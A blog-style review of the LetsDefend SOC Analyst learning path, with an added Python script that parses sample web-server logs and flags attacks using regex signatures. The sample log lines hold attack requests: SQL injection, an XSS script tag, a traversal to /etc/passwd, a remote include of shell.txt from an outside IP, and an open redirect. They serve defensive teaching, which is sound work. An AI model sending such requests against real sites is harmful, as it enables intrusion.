After spending about a month, on and off, with the LetsDefend SOC Analyst learning path, here's my experience with it.
Having finished LetsDefend's SOC Analyst path, I have some thoughts on it. For me, it was the very first Blue Team learning path that I ever took, and so far I think it has done a good job of introducing me to some of the very basic terms, concepts, and tools of this field. Thanks to it, I now feel comfortable diving into more advanced paths and concepts.
To explain it simply, I would divide the path's modules into two sections. They're listed below:
Theoretical section
The theoretical section, as I call it, starts by talking about the roles and responsibilities of a SOC Analyst and the various tools he makes use of, introducing us to terms such as SIEM, SOAR, EDR, log management, and threat intelligence, along with common mistakes that SOC Analysts make. Other modules talk briefly about common security solutions used in corporate environments, like antiviruses, intrusion detection systems, intrusion prevention systems, firewalls, wireless access firewalls, and email security solutions.
This section also goes through frameworks like the Cyber Kill Chain and the MITRE ATT&CK framework, going through the different stages of each. Moving further, it covers higher-level decisions businesses could take to improve their security posture by introducing users to things like the 3-2-1 rule for backing up data, risk analysis, and incident response.
Hands-on section
The hands-on section, as I would call it, differs in learning approach from the theoretical section. While the first section talks more about concepts on paper, the hands-on part is as it sounds: more practical, with quizzes, exercises, and alerts that one can interact with. It includes various modules built around different exercises that first teach about a vulnerability, tool, or concept and then provide exercises to practice it further. I'm further dividing the hands-on section below for the sake of clarity between sub-topics:
Malware Analysis
The malware analysis section of the path kicks off by introducing what malware analysis is, discussing the two major types, their differences, their importance, and when to use which. Furthermore, it teaches the basic usage of tools for both static and dynamic malware analysis, covering common techniques malware uses to obfuscate itself and its activities, as well as the usage of popular tools like Strings, Binwalk, Xorsearch, and more.
Web
The web portion has modules on various web attacks like SQL Injection, Cross-Site Scripting, IDOR, LFI/RFI, Open Redirection, Directory Traversal, XML, etc. All of these come with hands-on exercises in the form of log files that one has to analyze and answer questions about to progress further.
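To give a feel for what analyzing such log files involves, here is an added example (not from the LetsDefend exercises) that parses a few constructed web-server access-log lines, URL-decodes each request, and tags it with the attack classes the web module covers: SQL injection, XSS, directory traversal/LFI, RFI, and open redirection. The signatures are illustrative, not a production ruleset.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines in combined-log style (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?id=5 HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?id=5%27%20OR%201%3D1-- HTTP/1.1" 200 9120
10.0.0.8 - - [01/Jan/2024:10:00:03 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 300
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /view?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1200
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /page?include=http://203.0.113.9/shell.txt HTTP/1.1" 500 0
10.0.0.4 - - [01/Jan/2024:10:00:06 +0000] "GET /login?next=//evil.example/phish HTTP/1.1" 302 0
"""

# Fields of a combined-log line: client IP, timestamp, method, URL, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+)'
)

# Illustrative signatures, applied to the URL-decoded request (hypothetical, not a full ruleset).
SIGNATURES = {
    "sqli": re.compile(r"(?i)['\"]\s*(or|and)\s+\d+\s*=\s*\d+|union\s+select|--\s*$|/\*"),
    "xss": re.compile(r"(?i)<script|javascript:|onerror\s*="),
    "traversal_lfi": re.compile(r"\.\./|/etc/passwd|\.\.\\"),
    "rfi": re.compile(r"(?i)[?&]\w+=https?://"),
    "open_redirect": re.compile(r"(?i)[?&](next|url|redirect|return)=(https?:)?//"),
}

def classify_line(line):
    """Parse one log line; return its fields plus the attack classes the decoded URL matches."""
    m = LOG_RE.match(line)
    if not m:
        return None  # not a well-formed log line
    url = unquote_plus(m.group("url"))  # decode %27, %3C, + etc. before matching
    hits = [name for name, sig in SIGNATURES.items() if sig.search(url)]
    return {"ip": m.group("ip"), "url": url, "status": int(m.group("status")), "hits": hits}

def triage(log_text):
    """Return only the parsed entries that matched at least one signature."""
    results = []
    for line in log_text.splitlines():
        parsed = classify_line(line)
        if parsed and parsed["hits"]:
            results.append(parsed)
    return results

if __name__ == "__main__":
    for r in triage(SAMPLE_LOG):
        print(r["ip"], ",".join(r["hits"]), r["status"], r["url"])
```

The decoded URL and the status/size columns together are what an analyst reads: a 200 with an unusually large response to the `OR 1=1` request is a stronger indicator than the request string alone.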
Malicious Document Analysis
This module goes through the process of recognizing malicious documents, using suites like oletools to extract information about the malware and further analyzing it to make sense of its functioning.
Less covered tools
There are two dedicated rooms for both Virustotal and Splunk. The modules do a good job of introducing both tools but, in my opinion, they are lacking in the amount of content. I think tools like Splunk and Virustotal should have been explored more. The modules barely scratch the surface, especially for Splunk. Now, I don't know if it was intentional or not, but I felt a lack of quantity here.
Home labs
After all of the above-discussed content, the path has two modules for setting up a lab environment, one for malware analysis and the other for a SOC setup at home. The first one walks us through the process of setting up a FlareVM environment using Mandiant's script. The other module covers building a SOC lab for practice, including pfSense, Sysmon, Active Directory, and Crowdsec.
Conclusion
For absolute beginners who just have a basic understanding of computers and no idea about Blue Team, this learning path is approachable, which is its strength, but sometimes that can be its weakness too because it doesn't challenge a user that much. That's the only thing that had me a little concerned, coupled with occasional grammar mistakes that left me somewhat confused.
With all that aside, I think it is a good learning path to kick-start your Blue Team learning journey, and I think it can be the first foot in the door for many future SOC Analysts.